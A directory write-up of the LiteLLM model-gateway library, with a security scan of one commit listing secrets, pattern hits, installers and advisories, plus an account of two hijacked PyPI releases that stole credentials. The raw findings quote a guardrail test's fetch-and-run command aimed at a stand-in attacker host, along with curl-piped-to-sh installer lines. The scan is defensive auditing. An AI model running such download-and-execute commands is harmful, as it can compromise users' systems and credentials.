LiteLLM papers over the differences between model providers. As a Python library, one completion() call reaches OpenAI, Anthropic, Gemini, Bedrock, Azure, Vertex AI, Ollama, vLLM and more than 100 others with the same request format, the same response format and the same error types, so switching providers is a change to a model string. It adds retries and fallbacks across deployments and tracks the cost of each call.
As a proxy server, which the project calls its AI gateway, it puts that interface behind one OpenAI-compatible endpoint for a whole team. Admins hand out virtual keys with budgets and rate limits, track spend per user and project, apply guardrails and caching, and watch it all from a dashboard, while applications keep using the stock OpenAI SDK with a different base URL. It can also front MCP servers and A2A agents.
LiteLLM is built by BerriAI and has about 60,000 stars. Code outside the enterprise folder is MIT licensed; features such as SSO sit under a commercial licence. Other projects on this list use it to reach models, PR-Agent among them.
- Repository: github.com/BerriAI/litellm
- Licence: custom (Other)
- Language: Python. Stars: 60.1K. Forks: 12K. Last push: Oct 3, 2026.
- Scan: safe, Oct 3, 2026, commit 09313bc
Who it is for
Python developers who want to swap or mix model providers without rewriting code, and platform teams who need one controlled gateway for every model their company uses, with keys, budgets and logs in one place.
Getting started
1. Add the Python SDK to a project (pip install litellm also works)
uv add litellm2. Call any provider with the same function, with its key in the environment
python -c "from litellm import completion; print(completion(model='anthropic/claude-sonnet-4-20250514', messages=[{'role':'user','content':'Hello!'}]))"3. Or run the gateway, an OpenAI-compatible server on port 4000
uv tool install 'litellm[proxy]' && litellm --model gpt-4oProvider keys go in environment variables such as OPENAI_API_KEY and ANTHROPIC_API_KEY, and each provider bills its own calls. For a shared gateway, set a master key: the project's security policy treats a proxy run without one as a misconfiguration, not a bug. For production the README recommends Docker images with the -stable tag, which can be verified with cosign. Never install 1.82.7 or 1.82.8: those two PyPI releases were hijacked in March 2026 to steal credentials.
Safety scan
We cloned BerriAI/litellm at commit 09313bc on Oct 3, 2026 and ran the checks described on the GitHub Tools page: credential patterns, decode-and-execute code, install-time scripts, committed binaries, risky CI workflows, every host the code talks to, known vulnerabilities in pinned dependencies, and project hygiene. A person read every hit. This is what we found.
- Confirmed supply-chain incident: on March 24, 2026, attackers used a PyPI token exposed through the compromised Trivy scanner in LiteLLM's CI to publish litellm 1.82.7 and 1.82.8 (advisories GHSA-5mg7-485q-xm76 and PYSEC-2026-2). Version 1.82.8 added a litellm_init.pth file that ran on every Python start and collected SSH keys, cloud and Kubernetes credentials and .env files. Both were pulled within about three hours. If either was ever installed, rotate every credential that machine could reach. The commit scanned here is from October 2026, and the README now explains how to verify Docker images with cosign.
- No committed binaries across 13,077 files and about 3.6 million lines, 2.7 million of them Python. The 39 secret hits are fixtures: AWS-format placeholder keys in Bedrock and SageMaker tests, PEM placeholders in OCI, MCP and Vault tests, a redaction test's AKIAABCDEFGHIJKLMNOP, and a Slack webhook example made of X's in a field description. The 29 bare-IP URLs are SSRF and URL-validation tests using 8.8.8.8, 1.1.1.1, 93.184.216.34 and documentation ranges.
- Pattern hits: scripts/install.sh, install-cli.sh and quickstart.sh are the project's own curl | sh installers, which fetch uv from astral.sh if it is missing; the webhook.site URLs are router tests; the rest are long lines in test data and a guardrail test that contains a dangerous-looking command on purpose.
- Most of the 58 known advisories sit outside what you install: two test lockfiles (19 each), the Terraform provider's Go modules (10) and the Rust crates (9). The one critical and one high are LiteLLM's own host-header and MCP authentication bypasses, listed because a cookbook example pins the old 1.83.14. uv.lock, the real Python dependency set of 459 packages, has two (one high, an MLflow SSRF). Separately, OSV lists 17 LiteLLM advisories published between April and September 2026, including SQL injection in API-key checks and authentication bypasses, so run the proxy on a current release.
- 54 workflows. The only pull_request_target one, cost-map-guard.yml, runs the base branch's code with read-only permissions and reads the PR's pricing files as data. All 32 third-party actions are pinned to commits. Security policy with a bug bounty, Dependabot, CodeQL, licence and contributing guide present; OpenSSF Scorecard 6.1. The policy treats running the proxy without a master_key as a misconfiguration rather than a vulnerability.
What the scanner counted
| Check | Result |
|---|---|
| Secrets | 39 candidates found and read; see the notes above. |
| Suspicious code | 20 pattern hits found and read; every one is listed under the raw findings. |
| Install-time code | 2 Cargo build scripts. 11 installer scripts (one fetches and runs a remote script; one can call sudo) |
| Committed binaries | None. |
| CI workflows | 54 workflows. 1 uses pull_request_target, none check out the pull request head. 0 of 32 third-party actions pinned to a tag rather than a commit. |
| Network hosts | 40 distinct hosts referenced from source; most often github.com, api.openai.com, idp.example.com, docs.litellm.ai. 29 URLs to a bare IP address, listed under the raw findings. |
| Known vulnerabilities | 58 advisories across 2,740 pinned packages: 1 critical, 27 high, 16 moderate, 5 low, 9 unrated. cookbook/gollem_go_agent_framework/go.mod: 1 packages, 0 advisories; cookbook/litellm-ollama-docker-image/requirements.txt: 1 packages, 4 advisories; litellm-rust/Cargo.lock: 738 packages, 9 advisories; package-lock.json: 390 packages, 16 advisories; terraform/provider/go.mod: 52 packages, 10 advisories; tests/e2e/ui/package-lock.json: 101 packages, 0 advisories; tests/pass_through_tests/package-lock.json: 308 packages, 19 advisories; tests/proxy_admin_ui_tests/ui_unit_tests/package-lock.json: 510 packages, 19 advisories; ui/litellm-dashboard/package-lock.json: 851 packages, 1 advisories; uv.lock: 459 packages, 2 advisories; vscode-extension/package-lock.json: 231 packages, 0 advisories. |
| Project hygiene | Has security policy, automated dependency updates, CodeQL, licence file, contributing guide. |
| OpenSSF Scorecard | 6.1 out of 10, as of Oct 3, 2026. |
The raw findings
Every hit the scanner wrote out, with a link to the exact line at the scanned commit. Secrets candidates are redacted.
Secret candidates (39, redacted)
Pattern hits (20)
| Where | Rule | Match |
|---|---|---|
| litellm/litellm_core_utils/health_check_helpers.py:20 | very-long-line | 3366 chars |
| litellm/litellm_core_utils/prompt_templates/factory.py:5362 | very-long-line | 4402 chars |
| scripts/install-cli.sh:3 | download-piped-to-shell | # Usage: curl -fsSL https://raw.githubusercontent.com/BerriAI/litellm/main/scripts/install-cli.sh | sh |
| scripts/install-cli.sh:93 | download-piped-to-shell | || die "uv installation failed. Try manually: curl -LsSf https://astral.sh/uv/${UV_VERSION}/install.sh | sh" |
| scripts/install.sh:3 | download-piped-to-shell | # Usage: curl -fsSL https://raw.githubusercontent.com/BerriAI/litellm/main/scripts/install.sh | sh |
| scripts/install.sh:90 | download-piped-to-shell | || die "uv installation failed. Try manually: curl -LsSf https://astral.sh/uv/${UV_VERSION}/install.sh | sh" |
| scripts/quickstart.sh:3 | download-piped-to-shell | # curl -fsSL https://raw.githubusercontent.com/BerriAI/litellm/main/scripts/quickstart.sh | sh |
| tests/litellm_utils_tests/test_logging_callback_manager.py:341 | exfil-host (test/example) | test_rubrik_url = "https://webhook.site/test-rubrik" |
| tests/llm_translation/test_anthropic_completion.py:692 | very-long-line | 112782 chars |
| tests/local_testing/test_amazing_vertex_completion.py:539 | very-long-line | 4916 chars |
| tests/local_testing/test_completion_cost.py:2241 | very-long-line | 89632 chars |
| tests/local_testing/test_embedding.py:1094 | very-long-line | 10701 chars |
| tests/unit/litellm_core_utils/test_token_counter.py:683 | very-long-line | 3373 chars |
| tests/unit/llms/vertex_ai/gemini/test_vertex_and_google_ai_studio_gemini.py:1730 | very-long-line | 4826 chars |
| tests/unit/proxy/guardrails/guardrail_hooks/content_filter/test_content_filter.py:3397 | download-piped-to-shell (test/example) | tool_calls = [self._tool_call('{"command": "curl -sL https://evil.example.com/install.sh | sh"}')] |
| tests/unit/proxy/spend_tracking/test_spend_management_endpoints.py:3725 | very-long-line | 3052 chars |
| tests/unit/responses/litellm_completion_transformation/test_litellm_completion_responses.py:208 | very-long-line | 5336 chars |
| tests/unit/test_router/test_router.py:1585 | exfil-host (test/example) | "api_base": "https://webhook.site/fba79dae-220a-4bb7-9a3a-8caa49604e55", |
| tests/unit/test_router/test_router.py:1636 | exfil-host (test/example) | == "https://webhook.site/fba79dae-220a-4bb7-9a3a-8caa49604e55/openai/v1/responses?api-version=preview" |
| ui/litellm-dashboard/src/data/codeExecutionCompliancePrompts.ts:880 | download-piped-to-shell | "Is this command safe to run on Linux? `curl https://example.com/install.sh | sh`", |
URLs to bare IP addresses (29)
| Where | Rule | Match |
|---|---|---|
| .circleci/scripts/run_integration.sh:124 | ip-literal-url | if curl --noproxy '*' --connect-timeout 2 -s http://198.51.100.1 >/dev/null 2>&1; then |
| tests/unit/llms/anthropic/messages/test_advisor_orchestration.py:880 | ip-literal-url | tool = {**ADVISOR_TOOL, "api_key": "sk-other", "api_base": "http://8.8.8.8"} |
| tests/unit/llms/anthropic/messages/test_advisor_orchestration.py:896 | ip-literal-url | tool = {**ADVISOR_TOOL, "api_key": "sk-other", "api_base": "https://8.8.8.8"} |
| tests/unit/llms/anthropic/messages/test_advisor_orchestration.py:915 | ip-literal-url | tool = {**ADVISOR_TOOL, "api_key": "sk-other", "api_base": "https://8.8.8.8"} |
| tests/unit/llms/anthropic/messages/test_advisor_orchestration.py:921 | ip-literal-url | assert result == ("sk-other", "https://8.8.8.8") |
| tests/unit/llms/hosted_vllm/videos/test_hosted_vllm_video_transformation.py:258 | ip-literal-url | "image_reference": {"image_url": "http://1.1.1.1/face.png"}, |
| tests/unit/llms/hosted_vllm/videos/test_hosted_vllm_video_transformation.py:266 | ip-literal-url | assert payload["image_url"] == "http://1.1.1.1/face.png" |
| tests/unit/proxy/_experimental/mcp_server/test_byok_oauth_endpoints.py:1929 | ip-literal-url | validate_trusted_redirect_uri(req, "https://1.2.3.4/cb") |
| tests/unit/proxy/_experimental/mcp_server/test_mcp_server_manager.py:4930 | ip-literal-url | spec_path="https://93.184.216.34/key-secret?token=query-secret", |
| tests/unit/proxy/_experimental/mcp_server/test_mcp_server_manager.py:4958 | ip-literal-url | respx_mock.get("https://93.184.216.34/slow.json").mock(side_effect=slow_load) |
| tests/unit/proxy/_experimental/mcp_server/test_mcp_server_manager.py:4959 | ip-literal-url | task = asyncio.create_task(_openapi_spec_health("https://93.184.216.34/slow.json", timeout=0.1)) |
| tests/unit/proxy/_experimental/mcp_server/test_mcp_server_manager.py:13907 | ip-literal-url | spec_path="https://93.184.216.34/coalesced.json", |
| tests/unit/proxy/_experimental/mcp_server/test_mcp_server_manager.py:13937 | ip-literal-url | probe = _OpenAPIHealthProbe("https://93.184.216.34/expiry.json", clock=clock.__next__) |
| tests/unit/proxy/_experimental/mcp_server/test_mcp_server_manager.py:13962 | ip-literal-url | spec_path="https://93.184.216.34/large.json", |
| tests/unit/proxy/_experimental/mcp_server/test_mcp_server_manager.py:13983 | ip-literal-url | spec_path="https://93.184.216.34/cancelled-cache.json", auth_type=MCPAuth.none, |
| tests/unit/proxy/_experimental/mcp_server/test_openapi_to_mcp_generator.py:1567 | ip-literal-url | route = respx_mock.get("https://93.184.216.34/spec.json").respond(200, content=b'{"paths":{}}') |
| tests/unit/proxy/_experimental/mcp_server/test_openapi_to_mcp_generator.py:1568 | ip-literal-url | assert await load_openapi_spec_async("https://93.184.216.34/spec.json", max_bytes=max_bytes) == {"paths": {}} |
| tests/unit/proxy/_experimental/mcp_server/test_openapi_to_mcp_generator.py:1591 | ip-literal-url | respx_mock.get("https://93.184.216.34/spec.json").respond(200, headers=headers, stream=UnreadableStream()) |
| tests/unit/proxy/_experimental/mcp_server/test_openapi_to_mcp_generator.py:1593 | ip-literal-url | await load_openapi_spec_async("https://93.184.216.34/spec.json", max_bytes=12) |
| tests/unit/proxy/_experimental/mcp_server/test_openapi_to_mcp_generator.py:1617 | ip-literal-url | respx_mock.get("https://93.184.216.34/spec.json").respond(200, stream=ChunkedStream()) |
| tests/unit/proxy/_experimental/mcp_server/test_openapi_to_mcp_generator.py:1619 | ip-literal-url | await load_openapi_spec_async("https://93.184.216.34/spec.json", max_bytes=65536) |
| tests/unit/proxy/_experimental/mcp_server/test_openapi_to_mcp_generator.py:1624 | ip-literal-url | @pytest.mark.parametrize("target", ["https://93.184.216.35/final.json", "http://127.0.0.1/private.json"]) |
| tests/unit/proxy/_experimental/mcp_server/test_openapi_to_mcp_generator.py:1630 | ip-literal-url | respx_mock.get("https://93.184.216.34/spec.json").respond(302, headers={"location": target}) |
| tests/unit/proxy/_experimental/mcp_server/test_openapi_to_mcp_generator.py:1634 | ip-literal-url | await load_openapi_spec_async("https://93.184.216.34/spec.json", max_bytes=100) |
| and 5 more | ||
Installer scripts (11)
- .circleci/scripts/run_integration.sh, 260 lines, uses sudo
- .github/e2e-stack/start-idp.sh, 46 lines
- cookbook/litellm-ollama-docker-image/start.sh, 2 lines
- docker/install_auto_router.sh, 5 lines
- litellm/proxy/start.sh, 2 lines
- scripts/health_check/run_parallel_health_checks.ps1, 82 lines; talks to host.docker.internal, litellm-perf-cache-and-router.onrender.com, litellm.example.com
- scripts/health_check/run_parallel_health_checks.sh, 87 lines; talks to host.docker.internal, litellm-perf-cache-and-router.onrender.com, litellm.example.com
- scripts/install-cli.sh, 143 lines, fetches and runs a remote script; talks to astral.sh, docs.litellm.ai, github.com, raw.githubusercontent.com
- scripts/install.sh, 157 lines, fetches and runs a remote script; talks to astral.sh, docs.litellm.ai, github.com, raw.githubusercontent.com
- scripts/install_git_hooks.sh, 42 lines
- scripts/run_tracing_proxy_local.sh, 48 lines
Worst known vulnerabilities (24 of 58)
| Advisory | Severity | Package | Summary |
|---|---|---|---|
| GHSA-4xpc-pv4p-pm3w | critical | litellm@1.83.14 | LiteLLM: Authentication Bypass via Host Header Injection |
| GHSA-7488-6r32-c95q | high | litellm@1.83.14 | LiteLLM: MCP Authentication Bypass via OAuth2 Passthrough Fallback |
| GHSA-82j2-j2ch-gfr8 | high | rustls-webpki@0.101.7 | rustls-webpki: Denial of service via panic on malformed CRL BIT STRING |
| GHSA-3jxr-9vmj-r5cp | high | brace-expansion@5.0.5 | brace-expansion: DoS via exponential-time expansion of consecutive non-expanding {} groups |
| GHSA-6j4f-fj2g-mc7p | high | brace-expansion@5.0.5 | brace-expansion: DoS via uncontrolled recursion in parseCommaParts causing stack exhaustion |
| GHSA-mh99-v99m-4gvg | high | brace-expansion@5.0.5 | brace-expansion: DoS via unbounded expansion length causing an out-of-memory process crash |
| GHSA-qhr7-859c-m2p7 | high | brace-expansion@5.0.5 | brace-expansion: DoS via uncontrolled recursion on nested brace groups causing stack exhaustion |
| GHSA-rgw5-rvv9-x895 | high | brace-expansion@5.0.5 | brace-expansion: DoS via unbounded intermediate arrays, bypassing the CVE-2026-14257 mitigation |
| GHSA-vfj7-8cjw-p6xm | high | braces@3.0.3 | braces vulnerable to stack-exhaustion denial of service through deeply nested patterns |
| GHSA-73wf-gq98-2v4g | high | browserslist@4.28.0 | Browserslist: Uncaught crash / prototype write via untrusted browserslist-stats.json custom stats (normalizeStats) |
| GHSA-c83g-rgw3-j3cx | high | browserslist@4.28.0 | Browserslist: Unbounded memory growth (no cache eviction) via distinct query results, leading to eventual OOM |
| GHSA-2883-xcg3-v3hh | high | js-yaml@3.14.2 | js-yaml: maxTotalMergeKeys does not limit CPU use for empty merge sources |
| GHSA-52cp-r559-cp3m | high | js-yaml@3.14.2 | js-yaml: YAML merge-key chains can force quadratic CPU consumption |
| GHSA-5p4m-2wfm-xmqj | high | js-yaml@3.14.2 | JS-YAML: Quadratic CPU consumption in !!omap resolution (3.x and 4.x) - CVE-2026-59870 fix not backported |
| GHSA-2v4p-qf9q-27wj | high | google.golang.org/grpc@1.82.1 | gRPC-Go xDS servers: Denial of Service (DoS) via crash due to missing `:authority` and `Host` headers |
| GHSA-vp52-pcj8-j9qc | high | google.golang.org/grpc@1.82.1 | gRPC-Go: Heap Memory Exhaustion (OOM) via HTTP/2 DATA Frame Fragmentation |
| GHSA-3jxr-9vmj-r5cp | high | brace-expansion@1.1.14 | brace-expansion: DoS via exponential-time expansion of consecutive non-expanding {} groups |
| GHSA-6j4f-fj2g-mc7p | high | brace-expansion@1.1.14 | brace-expansion: DoS via uncontrolled recursion in parseCommaParts causing stack exhaustion |
| GHSA-mh99-v99m-4gvg | high | brace-expansion@1.1.14 | brace-expansion: DoS via unbounded expansion length causing an out-of-memory process crash |
| GHSA-qhr7-859c-m2p7 | high | brace-expansion@1.1.14 | brace-expansion: DoS via uncontrolled recursion on nested brace groups causing stack exhaustion |
| GHSA-rgw5-rvv9-x895 | high | brace-expansion@1.1.14 | brace-expansion: DoS via unbounded intermediate arrays, bypassing the CVE-2026-14257 mitigation |
| GHSA-73wf-gq98-2v4g | high | browserslist@4.28.2 | Browserslist: Uncaught crash / prototype write via untrusted browserslist-stats.json custom stats (normalizeStats) |
| GHSA-c83g-rgw3-j3cx | high | browserslist@4.28.2 | Browserslist: Unbounded memory growth (no cache eviction) via distinct query results, leading to eventual OOM |
| GHSA-wcpc-wj8m-hjx6 | high | protobufjs@7.6.0 | protobufjs: Denial of service through unbounded Any expansion during JSON conversion |
Workflows worth a look
- .github/workflows/cost-map-guard.yml: pull_request_target
By the numbers
| Stars | 60.1K |
|---|---|
| Forks | 12K |
| Contributors | 1,768 |
| Commits | 53.5K |
| Open issues | 1,800 |
| Open pull requests | 3,776 |
| Releases | 1,488 |
| Latest release | v1.103.2 |
| Licence | custom |
| Main language | Python |
| Project age | 3 years |
| Last push | Oct 3, 2026 |
| Tracked files | 13,077 |
| Lines of code | 3.6M |
| Checkout size | 211 MB |
Lines by language: Python 2.7M, TypeScript 433.7K, JSON 169.8K, Rust 145K, YAML 33.2K, Markdown 26K.
Questions
Is LiteLLM free?
The SDK and the proxy are MIT licensed outside the enterprise directory, and that free part includes virtual keys, spend tracking, load balancing and the admin UI. An enterprise licence adds features such as SSO, custom SLAs and professional support, and BerriAI also offers a hosted proxy. Model usage is billed by the providers either way.
What is the difference between the LiteLLM SDK and the proxy?
The SDK is a Python library you call from your own code. The proxy is a standalone server that exposes an OpenAI-compatible API, so any language or tool that speaks OpenAI can use it, and it adds what a shared service needs: keys, budgets, rate limits, logging and a dashboard.
Can LiteLLM route to local models?
Yes. Ollama, vLLM, NVIDIA NIM and other OpenAI-compatible servers are supported providers, so one gateway can mix local models with hosted ones and fall back from one to another.
This post is part of GitHub Tools, where every repository is cloned and scanned before it is written up. The scan is a snapshot of one commit on one day; the repository has moved on since, so check it before you install.
